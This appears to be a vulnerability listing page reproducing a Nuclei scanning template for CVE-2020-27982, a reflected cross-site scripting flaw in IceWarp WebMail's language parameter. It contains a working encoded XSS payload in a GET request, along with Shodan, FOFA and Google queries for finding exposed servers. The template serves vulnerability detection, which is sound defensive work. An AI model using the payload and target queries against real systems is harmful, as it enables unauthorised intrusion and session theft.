CVE-2020-27982: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: IceWarp WebMail 11.4.5.0 | POC: 已公开

漏洞描述

IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.

PoC代码[已公开]

id: CVE-2020-27982

info:
  name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.
  reference:
    - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
    - https://cxsecurity.com/issue/WLB-2020100161
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27982
    - http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-27982
    cwe-id: CWE-79
    epss-score: 0.07869
    epss-percentile: 0.91683
    cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: icewarp
    product: mail_server
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp server administration"
      - http.title:"icewarp"
      - cpe:"cpe:2.3:a:icewarp:mail_server"
    fofa-query:
      - title="icewarp server administration"
      - title="icewarp"
    google-query:
      - intitle:"icewarp server administration"
      - intitle:"icewarp"
      - powered by icewarp 10.4.4
  tags: cve,cve2020,xss,icewarp,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert(1)>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008c6cb09561a0047bf51848316a6c97eae049088da6aa305760ee2997540dab44022100cf7d26b4ab51b325a9181850b7ed90ba25711a1f0b25af309f3a17562eedb4ae:922c64590222798bb761d5b6d8e72950